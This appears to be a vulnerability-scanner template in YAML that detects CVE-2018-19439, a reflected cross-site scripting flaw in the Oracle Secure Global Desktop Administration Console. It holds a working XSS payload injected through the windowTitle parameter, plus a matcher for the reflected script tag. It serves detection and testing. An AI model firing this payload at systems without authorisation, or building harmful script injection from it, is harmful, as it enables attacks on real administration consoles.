18 lines
662 B
YAML
18 lines
662 B
YAML
id: CVE-2018-19439
|
|
|
|
info:
|
|
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
|
|
author: madrobot & dwisiswant0
|
|
severity: high
|
|
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<script>alert(1337)</script><!--</TITLE>"
|
|
part: body
|